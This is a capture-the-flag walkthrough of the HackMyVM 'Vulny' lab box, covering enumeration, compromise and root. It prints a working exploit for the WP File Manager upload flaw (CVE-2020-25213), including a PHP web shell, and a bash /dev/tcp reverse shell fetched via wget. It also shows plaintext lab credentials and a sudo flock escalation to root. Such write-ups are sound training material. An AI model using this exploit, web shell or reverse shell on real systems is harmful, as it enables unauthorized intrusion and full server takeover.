
HMV-Vulny

HMV-Vulny walkthrough


This box runs Ubuntu. At first the VM would not pick up an IP address and I spent a long time fixing that, which at least gave me material for my lab-setup post.
The fix is written up in: Building a lab environment on a Mac

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.139
sh: 0: getcwd() failed: No such file or directory
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 16:32 CST
Nmap scan report for 192.168.240.139 (192.168.240.139)
Host is up (0.0026s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: B2:A7:1A:3F:30:A9 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 2.61 ms 192.168.240.139 (192.168.240.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

Only one port is open, 80 (HTTP), so the next step is to look for more on the web side.

Web enumeration

The landing page is the stock Apache2/Ubuntu default page with nothing useful on it.
Directory brute-force:

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.240.139
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.240.139/_25-02-01_16-36-17.txt

Target: http://192.168.240.139/

[16:36:17] Starting:
[16:36:17] 403 - 280B - /.ht_wsr.txt
[16:36:17] 403 - 280B - /.htaccess.bak1
[16:36:17] 403 - 280B - /.htaccess.orig
[16:36:17] 403 - 280B - /.htaccess.sample
[16:36:17] 403 - 280B - /.htaccess_extra
[16:36:17] 403 - 280B - /.htaccess.save
[16:36:17] 403 - 280B - /.htaccessBAK
[16:36:17] 403 - 280B - /.htaccess_orig
[16:36:17] 403 - 280B - /.htaccessOLD
[16:36:17] 403 - 280B - /.htaccess_sc
[16:36:17] 403 - 280B - /.htaccessOLD2
[16:36:17] 403 - 280B - /.htm
[16:36:17] 403 - 280B - /.html
[16:36:17] 403 - 280B - /.httr-oauth
[16:36:17] 403 - 280B - /.htpasswds
[16:36:18] 403 - 280B - /.php
[16:36:19] 403 - 280B - /.htpasswd_test
[16:36:24] 301 - 323B - /javascript -> http://192.168.240.139/javascript/
[16:36:27] 301 - 319B - /secret -> http://192.168.240.139/secret/
[16:36:27] 403 - 280B - /server-status/
[16:36:27] 403 - 280B - /server-status
[16:36:27] 404 - 225B - /secret/

Task Completed

Two directories were found, /javascript and /secret. Note that /secret/ itself answered 404 with a 225-byte body; curl shows what that body actually is.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.139/javascript/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.240.139 Port 80</address>
</body></html>

The /javascript directory is forbidden (403); nothing to get there.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.139/secret/
Neither <b>/etc/wordpress/config-192.168.240.139.php</b> nor <b>/etc/wordpress/config-168.240.139.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.

So /secret is a WordPress install, but it cannot load its configuration. This message (and the 404 status dirsearch reported for /secret/) comes from the Debian-packaged wp-config.php, which derives the config filename /etc/wordpress/config-<host>.php from the Host header of the request; no file matches 192.168.240.139, so WordPress never starts.
Next, run dirsearch against /secret to enumerate its subdirectories.

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.240.139/secret/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.240.139/_secret__25-02-01_16-42-21.txt

Target: http://192.168.240.139/

[16:42:21] Starting: secret/
[16:42:22] 403 - 280B - /secret/.ht_wsr.txt
[16:42:22] 403 - 280B - /secret/.htaccess.save
[16:42:22] 403 - 280B - /secret/.htaccess.sample
[16:42:22] 403 - 280B - /secret/.htaccess.orig
[16:42:22] 403 - 280B - /secret/.htaccess.bak1
[16:42:22] 403 - 280B - /secret/.htaccess_extra
[16:42:22] 403 - 280B - /secret/.htaccessBAK
[16:42:22] 403 - 280B - /secret/.htaccessOLD
[16:42:22] 403 - 280B - /secret/.htm
[16:42:22] 403 - 280B - /secret/.html
[16:42:22] 403 - 280B - /secret/.htaccess_sc
[16:42:22] 403 - 280B - /secret/.htpasswds
[16:42:22] 403 - 280B - /secret/.htaccess_orig
[16:42:22] 403 - 280B - /secret/.htaccessOLD2
[16:42:22] 403 - 280B - /secret/.httr-oauth
[16:42:22] 403 - 280B - /secret/.htpasswd_test
[16:42:22] 403 - 280B - /secret/.php
[16:42:33] 200 - 3KB - /secret/readme.html
[16:42:36] 301 - 328B - /secret/wp-admin -> http://192.168.240.139/secret/wp-admin/
[16:42:36] 301 - 330B - /secret/wp-content -> http://192.168.240.139/secret/wp-content/
[16:42:36] 200 - 471B - /secret/wp-content/upgrade/
[16:42:36] 301 - 331B - /secret/wp-includes -> http://192.168.240.139/secret/wp-includes/
[16:42:36] 500 - 613B - /secret/wp-content/plugins/akismet/akismet.php
[16:42:36] 500 - 613B - /secret/wp-content/plugins/akismet/admin.php
[16:42:36] 403 - 280B - /secret/wp-includes/
[16:42:36] 200 - 488B - /secret/wp-content/uploads/
[16:42:36] 200 - 514B - /secret/wp-content/
[16:42:36] 500 - 0B - /secret/wp-includes/rss-functions.php
[16:42:39] 500 - 3KB - /secret/wp-admin/setup-config.php

A few more paths turn up.
wp-content holds the WordPress content files, and it is the only directory here with anything useful: it returns 200, i.e. directory listing is enabled, so its contents can be browsed directly.

Browsing it reveals an installed plugin, wp-file-manager.

At this point I did not know how to exploit the plugin; watching group owner ll104567's video got me unstuck. First, use searchsploit to find a ready-made Python exploit:

┌──(root㉿kakeru)-[~/tmp]
└─# searchsploit wp-file-manager
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE | php/webapps/51224.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿kakeru)-[~/tmp]
└─# searchsploit -m 51224
Exploit: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
URL: https://www.exploit-db.com/exploits/51224
Path: /usr/share/exploitdb/exploits/php/webapps/51224.py
Codes: CVE-2020-25213
Verified: True
File Type: Python script, ASCII text executable, with very long lines (501)
Copied to: /root/tmp/51224.py


Read the script to see what it does:

┌──(root㉿kakeru)-[~/tmp]
└─# cat 51224.py
#!/usr/bin/env python3

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys, signal, time, requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig, frame):
    # Ctrl-C handler ("Saliendo" = "Exiting")
    print("[!]Saliendo")
    sys.exit(1)

signal.signal(signal.SIGINT, handler)

def commandexec(command):
    # The upload lands in the connector's volume root, lib/files/; lib/php/../files/ resolves there
    exec_url = url + "/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {
        "cmd": command
    }

    r = requests.get(exec_url, params=params)

    # shell.php wraps the command output in <pre>; strip the tags before printing
    soup = BeautifulSoup(r.text, 'html.parser')
    text = soup.get_text()

    print(text)

def exploit():

    global url

    url = sys.argv[1]
    command = sys.argv[2]
    # elFinder connector bundled with the plugin; in 6.0-6.9 it answers without any WordPress login
    upload_url = url + "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

    headers = {
        'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
        'Connection': "close"
    }

    # elFinder "upload" command: target l1_Lw is the root of the plugin's local volume,
    # and upload[] carries the PHP web shell that gets written there as shell.php
    payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

    try:
        r = requests.post(upload_url, data=payload, headers=headers)
        #pprint(r.json())
        commandexec(command)
    except:
        # "Algo ha salido mal" = "Something went wrong"
        print("[!] Algo ha salido mal...")


def help():

    # "Uso" = usage, "Ejemplo" = example, "comando" = command
    print("\n[*] Uso: python3", sys.argv[0], "\"url\" \"comando\"")
    print("[!] Ejemplo: python3", sys.argv[0], "http://wordpress.local/ id")


if __name__ == '__main__':

    if len(sys.argv) != 3:
        help()

    else:
        exploit()

The script does two things. It POSTs a multipart request to the plugin's bundled elFinder connector, lib/php/connector.minimal.php, with cmd=upload, target=l1_Lw (the root of the plugin's lib/files volume) and a shell.php attachment; in File Manager 6.0-6.9 that connector answered without any WordPress login, which is CVE-2020-25213. It then requests the uploaded file and prints the output.
Since lib/php/../files/ resolves to lib/files/, once the upload has happened you can also skip the script and open http://192.168.240.139/secret/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=<command> in a browser.

Whatever is passed in cmd is executed as the web server user:

┌──(root㉿kakeru)-[~/tmp]
└─# python3 51224.py

[*] Uso: python3 51224.py "url" "comando"
[!] Ejemplo: python3 51224.py http://wordpress.local/ id

┌──(root㉿kakeru)-[~/tmp]
└─# python3 51224.py http://192.168.240.139/secret id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
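The request the script hardcodes as one long string, taken apart as an added example (my code, not the exploit author's or the plugin's). Two things are worth seeing built up rather than pasted: the elFinder target hash, which is `<volume id>_` plus base64 of the path inside the volume with `+/=` mapped to `-_.` and trailing dots stripped, so `l1_Lw` is volume `l1` at `/`, the root of lib/files on this box; and the multipart body itself, which is also parsed back the way a WAF or log-replay tool would see it. Everything runs offline; the boundary, filename and PHP payload are the script's own values, and any other paths fed to the hash functions are made up.

```python
import base64
import re
from typing import Optional

# elFinder target hash (used by the wp-file-manager connector): "<volume id>_" followed by
# base64(path relative to the volume root) with "+/=" mapped to "-_." and trailing "." stripped.
# The volume root itself is encoded as "/", which is why the exploit sends target=l1_Lw.
def elfinder_hash(rel_path: str, volume: str = "l1") -> str:
    b64 = base64.b64encode(rel_path.encode()).decode()
    return volume + "_" + b64.translate(str.maketrans("+/=", "-_.")).rstrip(".")

def elfinder_unhash(target: str) -> tuple[str, str]:
    """Inverse of elfinder_hash: returns (volume id, path relative to the volume root)."""
    volume, _, enc = target.partition("_")
    b64 = enc.translate(str.maketrans("-_.", "+/="))
    b64 += "=" * (-len(b64) % 4)          # restore the padding elFinder strips
    return volume, base64.b64decode(b64).decode()

def multipart_body(fields: list[tuple[str, str]],
                   files: list[tuple[str, str, str, str]],
                   boundary: str) -> bytes:
    """Hand-built multipart/form-data body: CRLF line endings and a closing boundary with no
    trailing CRLF, i.e. exactly the layout the exploit hardcodes as one string."""
    parts = []
    for name, value in fields:
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    for name, filename, ctype, content in files:
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
                     f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n{content}\r\n')
    parts.append(f"--{boundary}--")
    return "".join(parts).encode()

BOUNDARY = "----WebKitFormBoundaryvToPIGAB0m9SB1Ww"   # the exploit's own boundary string
WEBSHELL = '<?php echo "<pre>" . shell_exec($_REQUEST[\'cmd\']) . "</pre>"; ?>'   # the exploit's own payload

def upload_request(rel_path: str = "/", filename: str = "shell.php", content: str = WEBSHELL):
    """(headers, body) for the elFinder 'upload' command the exploit POSTs to connector.minimal.php."""
    body = multipart_body(
        fields=[("cmd", "upload"), ("target", elfinder_hash(rel_path))],
        files=[("upload[]", filename, "application/x-php", content)],
        boundary=BOUNDARY,
    )
    headers = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}", "Connection": "close"}
    return headers, body

def parse_multipart(body: bytes, boundary: str) -> dict[str, tuple[Optional[str], str]]:
    """Minimal parser for bodies built above (what a WAF or log-replay tool would see):
    {field name: (filename or None, value)}."""
    out = {}
    for part in body.split(("--" + boundary).encode())[1:]:
        if part.startswith(b"--"):          # closing boundary
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"(?:; filename="([^"]*)")?', head)
        filename = m.group(2).decode() if m.group(2) else None
        out[m.group(1).decode()] = (filename, value.rstrip(b"\r\n").decode())
    return out

if __name__ == "__main__":
    hdrs, body = upload_request()
    print(elfinder_unhash("l1_Lw"))        # ('l1', '/')
    print(hdrs["Content-Type"])
    print(body.decode())
    print(parse_multipart(body, BOUNDARY))
```

With the default arguments `upload_request()` reproduces the script's payload byte for byte; changing `rel_path` or `filename` shows how the same connector command would place a file elsewhere in the volume, which is the detail to match on when writing a rule for connector.minimal.php uploads.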

The usage message shows the syntax: replace id with whatever command you want to run.
Next, a reverse shell. I could not get one back with nc here (Ubuntu ships netcat-openbsd, which has no -e), so I used another route: write a reverse.sh containing a bash /dev/tcp one-liner. /dev/tcp is a bash feature, which is why the file is run with bash rather than sh below.

bash -i >& /dev/tcp/192.168.240.83/1234 0>&1   

Start an HTTP server so the target can fetch the file from my machine:

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Through the web shell, run:

?cmd=wget 192.168.240.83:8000/reverse.sh
?cmd=bash reverse.sh

The listener catches the shell. The prompt shows the working directory is the plugin's lib/files upload directory, which is why wget could write reverse.sh there:

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
bash: cannot set terminal process group (650): Inappropriate ioctl for device
bash: no job control in this shell
<ress/wp-content/plugins/wp-file-manager/lib/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<ress/wp-content/plugins/wp-file-manager/lib/files$

Privilege escalation

The error from /secret/ at the start named the PHP file that holds the credentials, /etc/wordpress/config-<host>.php. Find it and read it; the one that exists is keyed to a different IP:

www-data@vulny:/etc/wordpress$ cat config-192.168.1.122.php
cat config-192.168.1.122.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>
www-data@vulny:/etc/wordpress$

So the database password is myfuckingpassword. The file is named for 192.168.1.122, the address the box had when it was built, not its current one, which is why the Host-based lookup failed and the blog never rendered.
Following a write-up, I next looked at /usr/share/wordpress/wp-config.php:

www-data@vulny:/usr/share/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/***
* WordPress's Debianised default master config file
* Please do NOT edit and learn how the configuration works in
* /usr/share/doc/wordpress/README.Debian
***/

/* Look up a host-specific config file in
* /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
*/
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';
/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
require_once($debian_file);
define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
require_once($debian_main_file);
define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
require_once("/etc/wordpress/config-default.php");
define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
header("HTTP/1.0 404 Not Found");
echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
exit(1);
}

/* idrinksomewater */

/* Default value for some constants if they have not yet been set
by the host-specific config files */
if (!defined('ABSPATH'))
define('ABSPATH', '/usr/share/wordpress/');
if (!defined('WP_CORE_UPDATE'))
define('WP_CORE_UPDATE', false);
if (!defined('WP_ALLOW_MULTISITE'))
define('WP_ALLOW_MULTISITE', true);
if (!defined('DB_NAME'))
define('DB_NAME', 'wordpress');
if (!defined('DB_USER'))
define('DB_USER', 'wordpress');
if (!defined('DB_HOST'))
define('DB_HOST', 'localhost');
if (!defined('WP_CONTENT_DIR') && !defined('DONT_SET_WP_CONTENT_DIR'))
define('WP_CONTENT_DIR', '/var/lib/wordpress/wp-content');

/* Default value for the table_prefix variable so that it doesn't need to
be put in every host-specific config file */
if (!isset($table_prefix)) {
$table_prefix = 'wp_';
}

if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
$_SERVER['HTTPS'] = 'on';

require_once(ABSPATH . 'wp-settings.php');
?>

There is an odd comment, /* idrinksomewater */: that is the password for the user account. The username is visible as the directory name under /home (adrian).
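The host lookup at the top of this wp-config.php explains both the error /secret/ returned at the start and why dirsearch saw a 404 there. Here it is re-implemented in Python as an added example (my code, not Debian's or WordPress's) so the candidate filenames for a given Host header can be checked offline. The set of existing files is constructed to match this box, where only config-192.168.1.122.php exists; the other hostnames tried are made up.

```python
import re
from typing import Optional

CONFIG_DIR = "/etc/wordpress"

def debian_wp_config_candidates(http_host: str) -> list[str]:
    """Same steps as the top of Debian's wp-config.php: cut the port, keep only [a-zA-Z0-9.-],
    lowercase, then try config-<host>.php, config-<host without its first label>.php and
    config-default.php, in that order."""
    server = re.sub(r":.*", "", http_host)               # preg_replace('/:.*/', "", $_SERVER['HTTP_HOST'])
    server = re.sub(r"[^a-zA-Z0-9.\-]", "", server)       # preg_replace("/[^a-zA-Z0-9.\-]/", "", ...)
    main_server = re.sub(r"^[^.]*\.", "", server)         # multisite parent: drop the first label
    return [
        f"{CONFIG_DIR}/config-{server.lower()}.php",
        f"{CONFIG_DIR}/config-{main_server.lower()}.php",
        f"{CONFIG_DIR}/config-default.php",
    ]

def select_config(http_host: str, existing: set[str]) -> Optional[str]:
    """First candidate that exists, or None: the branch that sends HTTP 404 with the
    'Neither ... nor ...' text seen on /secret/."""
    for path in debian_wp_config_candidates(http_host):
        if path in existing:
            return path
    return None

def not_found_message(http_host: str) -> str:
    """The body wp-config.php emits (together with a 404 status) when no candidate exists."""
    first, main, _ = debian_wp_config_candidates(http_host)
    return (f"Neither <b>{first}</b> nor <b>{main}</b> could be found. <br/> Ensure one of them exists, "
            "is readable by the webserver and contains the right password/username.")

# Constructed to match this box: the only config present is keyed to the IP the VM had when it was built.
EXISTING_ON_VULNY = {f"{CONFIG_DIR}/config-192.168.1.122.php"}

if __name__ == "__main__":
    for host in ("192.168.240.139", "192.168.1.122"):
        print(host, "->", select_config(host, EXISTING_ON_VULNY))
    print(not_found_message("192.168.240.139"))
```

So a request carrying `Host: 192.168.1.122` (for example `curl -H 'Host: 192.168.1.122' http://192.168.240.139/secret/`) would have made wp-config.php find its config, and the 225-byte 404 dirsearch reported for /secret/ is exactly this message, since the same branch sets the status. The character filter is also why the Host header cannot be abused to read a file outside /etc/wordpress: slashes and anything else outside the allowed set are removed before the path is built.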
Switch to adrian and check sudo -l:

sudo -l
Matching Defaults entries for adrian on vulny:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock

Privilege escalation via flock. GTFOBins lists it:

sudo flock -u / /bin/sh

flock takes a file and a command: it performs the lock operation on the file and then execs the command. With -u it only releases a lock on / (one that was never held), so the lock step does nothing; the point is that flock, started by sudo as root, execs /bin/sh, which makes the rule equivalent to sudo /bin/sh. Any NOPASSWD sudo rule on a binary that will exec an arbitrary command is a root shell, whatever the binary's nominal purpose. The variant used below drops -u and simply takes the lock on / before running bash; same result:

sudo /usr/bin/flock / /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
ls
user.txt
cat /root/*.txt
HMVididit

Done.

Summary. Sticking points I hit: 1. enumerating the second-level directories under /secret; 2. finding the exploit script for the plugin; 3. getting a reverse shell without nc -e.
What I learned: 1. python3 -m http.server starts an HTTP server so the target can pull a script with wget; 2. using a reverse.sh: fetch it, then run it with bash; 3. on WordPress boxes, check /usr/share/wordpress/wp-config.php; 4. privilege escalation with flock.